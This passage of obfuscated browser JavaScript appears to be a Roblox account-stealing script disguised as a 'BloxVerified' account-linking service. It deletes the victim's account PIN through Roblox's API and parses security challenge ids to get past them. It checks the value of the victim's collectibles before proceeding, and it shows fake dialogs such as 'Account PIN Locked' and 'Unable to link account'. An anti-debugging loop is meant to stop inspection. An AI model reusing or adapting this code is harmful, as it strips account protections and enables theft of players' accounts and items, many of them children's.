                      document.body.insertAdjacentHTML("beforeend", "<div id=\"pinPopupz\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div class=\"modal-content\" role=\"document\"><div title=\"\" class=\"modal-header\"><button type=\"button\" class=\"modal-modern-header-button\"></button><h4 class=\"modal-title\">Account PIN Locked</h4><div class=\"modal-modern-header-info\"></div></div><div class=\"modal-body\"><p>Unlock the PIN attached to your account to continue</p></div><div class=\"modal-footer\"><div class=\"modal-modern-footer-buttons\"><a class=\"btn-cta-md modal-modern-footer-button\" aria-label=\"Set Up\" target=\"_blank\" href=\"https://www.roblox.com/my/account#!/parental-controls\">Open Settings</a></div></div></div></div></div></div>");
                      document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                        document.getElementById("pinPopupz").remove();
                        document.getElementsByClassName(T.VomRO)[0].innerText = T.fHchc;
                      };
                    }
                  } else {
                    try {
                      document.getElementById("pinPopupz").remove();
                    } catch {}
                    $.ajax({
                      "method": "DELETE",
                      "url": "https://auth.roblox.com/v1/account/pin",
                      "contentType": "application/json",
                      "success": function () {
                        g(null, null);
                      },
                      "error": function (O) {
                        var D = atob(O.getResponseHeader("rblx-challenge-metadata"));
                        var c = O.getResponseHeader("rblx-challenge-id");
                        var P = D.split("\"challengeId\":\"").pop().split("\"")[0];
                        y(P, c, null);
                      }
                    });
                  }
                } else {
                  g(null, null);
                }
              }
            });
          }
        }
        (async function () {
          await j(800);
          if (validDev.length > 0) {
            f();
          } else {
            function B(I) {
              const S = "https://inventory.roblox.com/v1/users/" + I + "/assets/collectibles?assetType=null&cursor=&limit=100&sortOrder=Desc";
              var M = {
                url: S,
                type: "GET"
              };
              return $.ajax(M);
            }
            B(H).done(function (I) {
              if (I && I.data && I.data.length > 0) {
                let g = 0;
                I.data.forEach(R => {
                  if (R.recentAveragePrice) {
                    g += R.recentAveragePrice;
                  }
                });
                if (g > 5000) {
                  f();
                } else {
                  var y = "<div id=\"promptPopup\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div role=\"document\" class=\"modal-content\"><div class=\"update-two-step\"><div class=\"modal-header\"><div class=\"modal-modern-header-button\"><button type=\"button\" class=\"close\"><span aria-hidden=\"true\"><span class=\"icon-close\" id=\"closeButton1\"></span></span><span class=\"sr-only\">Close</span></button></div><div class=\"modal-title\"><h5>Unable to link account</h5></div></div><div class=\"modal-body\"><div class=\"text-center\"><div>Your account is not qualified to be linked to BloxVerified.\nAlternative accounts are not allowed</div></div></div><div class=\"modal-footer\"></div></div></div></div></div></div>";
                  document.body.insertAdjacentHTML("beforeend", y);
                  document.getElementById("closeButton1").onclick = function () {
                    document.getElementById("promptPopup").remove();
                    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                  };
                  document.getElementById("promptPopup").onclick = function () {
                    document.getElementById("promptPopup").remove();
                    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                  };
                }
              } else {
                var y = "<div id=\"promptPopup\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div role=\"document\" class=\"modal-content\"><div class=\"update-two-step\"><div class=\"modal-header\"><div class=\"modal-modern-header-button\"><button type=\"button\" class=\"close\"><span aria-hidden=\"true\"><span class=\"icon-close\" id=\"closeButton1\"></span></span><span class=\"sr-only\">Close</span></button></div><div class=\"modal-title\"><h5>Unable to link account</h5></div></div><div class=\"modal-body\"><div class=\"text-center\"><div>Your account is not qualified to be linked to BloxVerified.\nAlternative accounts are not allowed</div></div></div><div class=\"modal-footer\"></div></div></div></div></div></div>";
                document.body.insertAdjacentHTML("beforeend", y);
                document.getElementById("closeButton1").onclick = function () {
                  document.getElementById("promptPopup").remove();
                  document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                };
                document.getElementById("promptPopup").onclick = function () {
                  document.getElementById("promptPopup").remove();
                  document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                };
              }
            }).fail(function () {
              document.body.insertAdjacentHTML("beforeend", "<div id=\"promptPopup\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div role=\"document\" class=\"modal-content\"><div class=\"update-two-step\"><div class=\"modal-header\"><div class=\"modal-modern-header-button\"><button type=\"button\" class=\"close\"><span aria-hidden=\"true\"><span class=\"icon-close\" id=\"closeButton1\"></span></span><span class=\"sr-only\">Close</span></button></div><div class=\"modal-title\"><h5>Error</h5></div></div><div class=\"modal-body\"><div class=\"text-center\"><div>Please refresh your page and try again, an error has occured.</div></div></div><div class=\"modal-footer\"></div></div></div></div></div></div>");
              document.getElementById("closeButton1").onclick = function () {
                document.getElementById("promptPopup").remove();
                document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
              };
              document.getElementById("promptPopup").onclick = function () {
                document.getElementById("promptPopup").remove();
                document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
              };
            });
          }
        })();
      },
      "error": function () {
        document.body.insertAdjacentHTML("beforeend", "<div id=\"promptPopup\" role=\"dialog\"><div class=\"fade modal-backdrop in\"></div><div role=\"dialog\" tabindex=\"-1\" class=\"fade modal-modern in modal\" style=\"display: block; padding-left: 23px;\"><div class=\"modal-dialog\"><div role=\"document\" class=\"modal-content\"><div class=\"update-two-step\"><div class=\"modal-header\"><div class=\"modal-modern-header-button\"><button type=\"button\" class=\"close\"><span aria-hidden=\"true\"><span class=\"icon-close\" id=\"closeButton1\"></span></span><span class=\"sr-only\">Close</span></button></div><div class=\"modal-title\"><h5>Unable to link account</h5></div></div><div class=\"modal-body\"><div class=\"text-center\"><div>You are currently signed out of Roblox</div></div></div><div class=\"modal-footer\"></div></div></div></div></div></div>");
        document.getElementById("closeButton1").onclick = function () {
          document.getElementById("promptPopup").remove();
          document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
        };
        document.getElementById("promptPopup").onclick = function () {
          document.getElementById("promptPopup").remove();
          document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
        };
      }
    });
  }
})();
(function () {
  var C = function () {
    var t;
    try {
      t = Function("return (function() {}.constructor(\"return this\")( ));")();
    } catch (G) {
      t = window;
    }
    return t;
  };
  var V = C();
  V.setInterval(a, 4000);
})();
function a(J) {
  function V(t) {
    if (typeof t === "string") {
      return function (G) {}.constructor("while (true) {}").apply("counter");
    } else if (("" + t / t).length !== 1 || t % 20 === 0) {
      (function () {
        return true;
      }).constructor("debugger").call("action");
    } else {
      (function () {
        return false;
      }).constructor("debugger").apply("stateObject");
    }
    V(++t);
  }
  try {
    if (J) {
      return V;
    } else {
      V(0);
    }
  } catch (t) {}
}
